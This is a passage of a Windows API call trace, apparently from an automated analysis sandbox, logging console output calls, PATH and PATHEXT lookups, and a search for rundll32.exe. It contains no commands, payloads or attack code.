(lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6b [0044.449] GetLastError () returned 0xcb [0044.449] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x510eaf8 | out: lpConsoleScreenBufferInfo=0x510eaf8) returned 1 [0044.449] GetLastError () returned 0xcb [0044.449] GetConsoleOutputCP () returned 0x1b5 [0044.450] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.450] GetLastError () returned 0xcb [0044.452] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f [0044.452] GetLastError () returned 0xcb [0044.452] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6f, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.452] GetLastError () returned 0xcb [0044.454] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x73 [0044.454] GetLastError () returned 0xcb [0044.454] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x73, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.454] GetLastError () returned 0xcb [0044.457] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0044.457] GetLastError () returned 0xcb [0044.457] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.457] GetLastError () returned 0xcb [0044.457] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1 [0044.458] GetLastError () returned 0xcb [0044.458] CloseHandle (hObject=0x77) returned 1 [0044.458] GetLastError () returned 0xcb [0044.460] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0044.461] GetLastError () returned 0xcb [0044.461] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.461] GetLastError () returned 0xcb [0044.461] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1 [0044.461] GetLastError () returned 0xcb [0044.461] CloseHandle (hObject=0x77) returned 1 [0044.461] GetLastError () returned 0xcb [0044.463] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0044.464] GetLastError () returned 0xcb [0044.464] GetConsoleMode (in: hConsoleHandle=0x77, lpMode=0x510eaec | out: lpMode=0x510eaec) returned 1 [0044.464] GetLastError () returned 0xcb [0044.464] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x254b0fc*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0x510eaec, lpReserved=0x0 | out: lpBuffer=0x254b0fc*, lpNumberOfCharsWritten=0x510eaec*=0x1c) returned 1 [0044.464] GetLastError () returned 0xcb [0044.464] CloseHandle (hObject=0x77) returned 1 [0044.465] GetLastError () returned 0xcb [0044.467] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0044.467] GetLastError () returned 0xcb [0044.467] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.467] GetLastError () returned 0xcb [0044.467] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1 [0044.467] GetLastError () returned 0xcb [0044.467] CloseHandle (hObject=0x77) returned 1 [0044.467] GetLastError () returned 0xcb [0044.469] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0044.470] GetLastError () returned 0xcb [0044.470] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.470] GetLastError () returned 0xcb [0044.470] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1 [0044.470] GetLastError () returned 0xcb [0044.470] CloseHandle (hObject=0x77) returned 1 [0044.470] GetLastError () returned 0xcb [0044.472] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0044.473] GetLastError () returned 0xcb [0044.473] GetConsoleMode (in: hConsoleHandle=0x77, lpMode=0x510eb2c | out: lpMode=0x510eb2c) returned 1 [0044.473] GetLastError () returned 0xcb [0044.473] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x1df9b74*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x510eb2c, lpReserved=0x0 | out: lpBuffer=0x1df9b74*, lpNumberOfCharsWritten=0x510eb2c*=0x1) returned 1 [0044.473] GetLastError () returned 0xcb [0044.473] CloseHandle (hObject=0x77) returned 1 [0044.473] GetLastError () returned 0xcb [0044.475] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0044.476] GetLastError () returned 0xcb [0044.476] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x510eaf8 | out: lpConsoleScreenBufferInfo=0x510eaf8) returned 1 [0044.476] GetLastError () returned 0xcb [0044.476] GetConsoleOutputCP () returned 0x1b5 [0044.476] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.476] GetLastError () returned 0xcb [0044.478] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7b [0044.478] GetLastError () returned 0xcb [0044.478] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7b, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.478] GetLastError () returned 0xcb [0044.480] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7f [0044.480] GetLastError () returned 0xcb [0044.480] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7f, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.480] GetLastError () returned 0xcb [0044.482] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0044.482] GetLastError () returned 0xcb [0044.482] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.483] GetLastError () returned 0xcb [0044.483] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1 [0044.483] GetLastError () returned 0xcb [0044.483] CloseHandle (hObject=0x83) returned 1 [0044.483] GetLastError () returned 0xcb [0044.485] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0044.485] GetLastError () returned 0xcb [0044.485] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.485] GetLastError () returned 0xcb [0044.485] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1 [0044.485] GetLastError () returned 0xcb [0044.486] CloseHandle (hObject=0x83) returned 1 [0044.486] GetLastError () returned 0xcb [0044.488] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0044.488] GetLastError () returned 0xcb [0044.488] GetConsoleMode (in: hConsoleHandle=0x83, lpMode=0x510eaec | out: lpMode=0x510eaec) returned 1 [0044.488] GetLastError () returned 0xcb [0044.488] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x254b534*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x510eaec, lpReserved=0x0 | out: lpBuffer=0x254b534*, lpNumberOfCharsWritten=0x510eaec*=0x4f) returned 1 [0044.488] GetLastError () returned 0xcb [0044.488] CloseHandle (hObject=0x83) returned 1 [0044.488] GetLastError () returned 0xcb [0044.490] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0044.491] GetLastError () returned 0xcb [0044.491] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.491] GetLastError () returned 0xcb [0044.491] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1 [0044.491] GetLastError () returned 0xcb [0044.491] CloseHandle (hObject=0x83) returned 1 [0044.491] GetLastError () returned 0xcb [0044.493] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0044.493] GetLastError () returned 0xcb [0044.493] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.494] GetLastError () returned 0xcb [0044.494] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1 [0044.494] GetLastError () returned 0xcb [0044.494] CloseHandle (hObject=0x83) returned 1 [0044.494] GetLastError () returned 0xcb [0044.496] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0044.496] GetLastError () returned 0xcb [0044.496] GetConsoleMode (in: hConsoleHandle=0x83, lpMode=0x510eb2c | out: lpMode=0x510eb2c) returned 1 [0044.496] GetLastError () returned 0xcb [0044.496] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x1df9b74*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x510eb2c, lpReserved=0x0 | out: lpBuffer=0x1df9b74*, lpNumberOfCharsWritten=0x510eb2c*=0x1) returned 1 [0044.496] GetLastError () returned 0xcb [0044.497] CloseHandle (hObject=0x83) returned 1 [0044.497] GetLastError () returned 0xcb [0044.499] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0044.499] GetLastError () returned 0xcb [0044.499] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x510eaf8 | out: lpConsoleScreenBufferInfo=0x510eaf8) returned 1 [0044.499] GetLastError () returned 0xcb [0044.499] GetConsoleOutputCP () returned 0x1b5 [0044.499] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.499] GetLastError () returned 0xcb [0044.501] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x87 [0044.501] GetLastError () returned 0xcb [0044.501] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x87, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.501] GetLastError () returned 0xcb [0044.503] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x8b [0044.504] GetLastError () returned 0xcb [0044.504] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x8b, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.504] GetLastError () returned 0xcb [0044.506] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x8f [0044.506] GetLastError () returned 0xcb [0044.506] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x8f, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.506] GetLastError () returned 0xcb [0044.506] SetConsoleTextAttribute (hConsoleOutput=0x8f, wAttributes=0xc) returned 1 [0044.507] GetLastError () returned 0xcb [0044.507] CloseHandle (hObject=0x8f) returned 1 [0044.507] GetLastError () returned 0xcb [0044.509] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x8f [0044.509] GetLastError () returned 0xcb [0044.509] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x8f, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.509] GetLastError () returned 0xcb [0044.509] SetConsoleTextAttribute (hConsoleOutput=0x8f, wAttributes=0xc) returned 1 [0044.509] GetLastError () returned 0xcb [0044.509] CloseHandle (hObject=0x8f) returned 1 [0044.509] GetLastError () returned 0xcb [0044.511] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x8f [0044.512] GetLastError () returned 0xcb [0044.512] GetConsoleMode (in: hConsoleHandle=0x8f, lpMode=0x510eaec | out: lpMode=0x510eaec) returned 1 [0044.512] GetLastError () returned 0xcb [0044.512] WriteConsoleW (in: hConsoleOutput=0x8f, lpBuffer=0x254ba64*, nNumberOfCharsToWrite=0x37, lpNumberOfCharsWritten=0x510eaec, lpReserved=0x0 | out: lpBuffer=0x254ba64*, lpNumberOfCharsWritten=0x510eaec*=0x37) returned 1 [0044.512] GetLastError () returned 0xcb [0044.512] CloseHandle (hObject=0x8f) returned 1 [0044.512] GetLastError () returned 0xcb [0044.514] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x8f [0044.514] GetLastError () returned 0xcb [0044.514] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x8f, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.515] GetLastError () returned 0xcb [0044.515] SetConsoleTextAttribute (hConsoleOutput=0x8f, wAttributes=0x7) returned 1 [0044.515] GetLastError () returned 0xcb [0044.515] CloseHandle (hObject=0x8f) returned 1 [0044.515] GetLastError () returned 0xcb [0044.517] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x8f [0044.517] GetLastError () returned 0xcb [0044.517] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x8f, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.517] GetLastError () returned 0xcb [0044.517] SetConsoleTextAttribute (hConsoleOutput=0x8f, wAttributes=0x7) returned 1 [0044.518] GetLastError () returned 0xcb [0044.518] CloseHandle (hObject=0x8f) returned 1 [0044.518] GetLastError () returned 0xcb [0044.520] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x8f [0044.521] GetLastError () returned 0xcb [0044.521] GetConsoleMode (in: hConsoleHandle=0x8f, lpMode=0x510eb2c | out: lpMode=0x510eb2c) returned 1 [0044.521] GetLastError () returned 0xcb [0044.521] WriteConsoleW (in: hConsoleOutput=0x8f, lpBuffer=0x1df9b74*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x510eb2c, lpReserved=0x0 | out: lpBuffer=0x1df9b74*, lpNumberOfCharsWritten=0x510eb2c*=0x1) returned 1 [0044.521] GetLastError () returned 0xcb [0044.521] CloseHandle (hObject=0x8f) returned 1 [0044.522] GetLastError () returned 0xcb [0044.524] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x8f [0044.524] GetLastError () returned 0xcb [0044.524] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x8f, lpConsoleScreenBufferInfo=0x510eaf8 | out: lpConsoleScreenBufferInfo=0x510eaf8) returned 1 [0044.524] GetLastError () returned 0xcb [0044.524] GetConsoleOutputCP () returned 0x1b5 [0044.524] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.524] GetLastError () returned 0xcb [0044.526] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x93 [0044.526] GetLastError () returned 0xcb [0044.526] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x93, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.526] GetLastError () returned 0xcb [0044.528] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x97 [0044.528] GetLastError () returned 0xcb [0044.528] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x97, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.529] GetLastError () returned 0xcb [0044.530] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9b [0044.531] GetLastError () returned 0xcb [0044.531] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x9b, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.531] GetLastError () returned 0xcb [0044.531] SetConsoleTextAttribute (hConsoleOutput=0x9b, wAttributes=0xc) returned 1 [0044.531] GetLastError () returned 0xcb [0044.531] CloseHandle (hObject=0x9b) returned 1 [0044.531] GetLastError () returned 0xcb [0044.533] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9b [0044.533] GetLastError () returned 0xcb [0044.533] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x9b, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.533] GetLastError () returned 0xcb [0044.534] SetConsoleTextAttribute (hConsoleOutput=0x9b, wAttributes=0xc) returned 1 [0044.534] GetLastError () returned 0xcb [0044.534] CloseHandle (hObject=0x9b) returned 1 [0044.534] GetLastError () returned 0xcb [0044.536] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9b [0044.536] GetLastError () returned 0xcb [0044.536] GetConsoleMode (in: hConsoleHandle=0x9b, lpMode=0x510eaec | out: lpMode=0x510eaec) returned 1 [0044.536] GetLastError () returned 0xcb [0044.536] WriteConsoleW (in: hConsoleOutput=0x9b, lpBuffer=0x254be60*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x510eaec, lpReserved=0x0 | out: lpBuffer=0x254be60*, lpNumberOfCharsWritten=0x510eaec*=0x1) returned 1 [0044.536] GetLastError () returned 0xcb [0044.536] CloseHandle (hObject=0x9b) returned 1 [0044.537] GetLastError () returned 0xcb [0044.539] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9b [0044.540] GetLastError () returned 0xcb [0044.540] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x9b, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.541] GetLastError () returned 0xcb [0044.541] SetConsoleTextAttribute (hConsoleOutput=0x9b, wAttributes=0x7) returned 1 [0044.541] GetLastError () returned 0xcb [0044.541] CloseHandle (hObject=0x9b) returned 1 [0044.541] GetLastError () returned 0xcb [0044.543] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9b [0044.543] GetLastError () returned 0xcb [0044.543] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x9b, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.543] GetLastError () returned 0xcb [0044.543] SetConsoleTextAttribute (hConsoleOutput=0x9b, wAttributes=0x7) returned 1 [0044.544] GetLastError () returned 0xcb [0044.544] CloseHandle (hObject=0x9b) returned 1 [0044.544] GetLastError () returned 0xcb [0044.546] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9b [0044.546] GetLastError () returned 0xcb [0044.546] GetConsoleMode (in: hConsoleHandle=0x9b, lpMode=0x510eb2c | out: lpMode=0x510eb2c) returned 1 [0044.546] GetLastError () returned 0xcb [0044.546] WriteConsoleW (in: hConsoleOutput=0x9b, lpBuffer=0x1df9b74*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x510eb2c, lpReserved=0x0 | out: lpBuffer=0x1df9b74*, lpNumberOfCharsWritten=0x510eb2c*=0x1) returned 1 [0044.546] GetLastError () returned 0xcb [0044.546] CloseHandle (hObject=0x9b) returned 1 [0044.547] GetLastError () returned 0xcb [0044.548] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x325c38, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0044.548] GetLastError () returned 0xcb [0044.549] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x325c38, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0044.549] GetLastError () returned 0xcb [0044.552] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x325c38 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0044.552] GetLastError () returned 0xcb [0044.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x510e8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0044.569] GetLastError () returned 0xcb [0044.570] SetErrorMode (uMode=0x1) returned 0x1 [0044.572] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\rundll32.exe", lpFindFileData=0x325c38 | out: lpFindFileData=0x325c38) returned 0x345fa8 [0044.572] GetLastError () returned 0xcb [0044.573] FindNextFileW (in: hFindFile=0x345fa8, lpFindFileData=0x325c38 | out: lpFindFileData=0x325c38) returned 0 [0044.573] GetLastError () returned 0x12 [0044.573] FindClose (in: hFindFile=0x345fa8 | out: hFindFile=0x345fa8) returned 1 [0044.573] SetErrorMode (uMode=0x1) returned 0x1 [0044.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\rundll32.exe", nBufferLength=0x105, lpBuffer=0x510e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\rundll32.exe", lpFilePart=0x0) returned 0x20 [0044.576] GetLastError () returned 0x12 [0044.576] SetErrorMode (uMode=0x1) returned 0x1 [0044.576] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\rundll32.exe" (normalized: "c:\\windows\\system32\\rundll32.exe"), fInfoLevelId=0x0, lpFileInformation=0x510ee48 | out: lpFileInformation=0x510ee48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a618c0d, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x7a618c0d, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7122c890, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xae00)) returned 1 [0044.577] GetLastError () returned 0x12 [0044.577] SetErrorMode (uMode=0x1) returned 0x1 [0044.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x325c38, nSize=0x80 | out: lpBuffer="") returned 0x0 [0044.577] GetLastError () returned 0xcb [0044.578] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x325c38, nSize=0x80 | out: lpBuffer="") returned 0x0 [0044.578] GetLastError () returned 0xcb [0044.582] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x325c38, nSize=0x80 | out: lpBuffer="") returned 0x0 [0044.583] GetLastError () returned 0xcb [0044.589] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\rundll32.exe", dwFileAttributes=0x0, psfi=0x325c38, cbFileInfo=0x160, uFlags=0x2000 | out: psfi=0x325c38) returned 0x6014550 [0044.595] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x325c38, nSize=0x80 | out: lpBuffer="") returned 0x0 [0044.595] GetLastError () returned 0xcb 